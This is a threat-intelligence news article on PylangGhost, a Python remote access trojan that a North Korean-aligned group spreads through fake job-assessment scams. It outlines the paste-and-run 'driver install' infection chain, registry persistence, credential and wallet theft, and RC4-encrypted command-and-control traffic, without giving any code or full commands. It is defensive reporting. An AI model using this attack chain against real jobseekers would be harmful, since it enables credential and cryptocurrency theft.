North Korean Group Deploys Python-Based PylangGhost RAT in Job Scam Campaigns

Threat activity uncovered in May 2025 involved the use of a Python-based remote access trojan (RAT) tracked as “PylangGhost,” as identified by Cisco Talos. The campaign is attributed to the North Korean-aligned threat actor Famous Chollima, also known as Wagemole. The actor is financially motivated and leverages tactics such as fake job recruitment to harvest sensitive personal information or embed operatives in victim environments. Talos links this activity to the ongoing “Contagious Interview” campaign, where fake employers lure jobseekers under false pretenses. The latest campaign targets users in India by posing as well-known companies like Archblock, Coinbase, and Robinhood, with fabricated job roles including Business Development Manager and Marketing Strategist. Victims are prompted to participate in fake assessments under the guise of employment screening, particularly individuals in software engineering, design, and marketing roles.

The infection chain begins once a user agrees to participate in a skill evaluation. After submitting responses to job-specific questions, victims are prompted to enable camera access and execute system commands intended to simulate video driver installation. These commands, mimicking the paste-and-run from the ClickFix campaign, are tailored for the operating system: on Windows, either PowerShell’s "Invoke-WebRequest" or "curl.exe" is used to download a ZIP file into the "%TEMP%" directory. The archive contains a Visual Basic Script, which is launched via "wscript.exe," triggering the execution of a renamed Python interpreter file labeled "nvidia.py." On macOS, a Bash command downloads a shell script using "curl," while Linux users encountered errors at this stage during Talos' testing. Once executed, "nvidia.py" unpacks Python libraries, sets up persistence by modifying the Windows registry, and initiates communication with the actor’s command and control (C2) server.

PylangGhost includes six structured Python modules, mirroring those of the previously documented GolangGhost, with modules handling configuration, system interaction, browser credential theft, compression, and C2 protocol logic. Despite structural parity with its Golang predecessor, Talos notes that there is no evidence large language models were used in the Python variant’s development. "Based on the comments in the code, it is unlikely that the threat actors used a large language model (LLM) to help rewrite the code for Python," reports Cisco Talos' intelligence and researcher Vanja Svajcer. Once executed, "nvidia.py" creates a registry key for persistence and establishes a GUID to identify the infected host. The RAT enters a loop to process commands from the C2, enabling a wide range of operations including OS shell execution, file upload/download, and credential harvesting. The Python version features identical command codes as the Golang variant and supports theft from over 80 browser extensions, including managers and wallets like Metamask, Phantom, NordPass, and TronLink.

The communications between PylangGhost and its C2 servers rely on HTTP, with RC4 encryption applied to the payload. Packets are prefaced with an MD5 checksum and an embedded RC4 key for verification and decryption, respectively. This choice of encryption protocol allows the actor to obfuscate payloads while maintaining relatively lightweight communication. Other modules such as "util.py" manage data compression, while "command.py" interprets encoded command messages, and "auto.py" extracts session data and browser artifacts. Cisco Talos' comparison between the Python and Golang variants highlights near-identical functional design, suggesting the same actor or team maintains both. Given the actor’s operational breadth and modular malware design, campaign targets should remain cautious of unsolicited messages and scrutinize job postings from unfamiliar sources.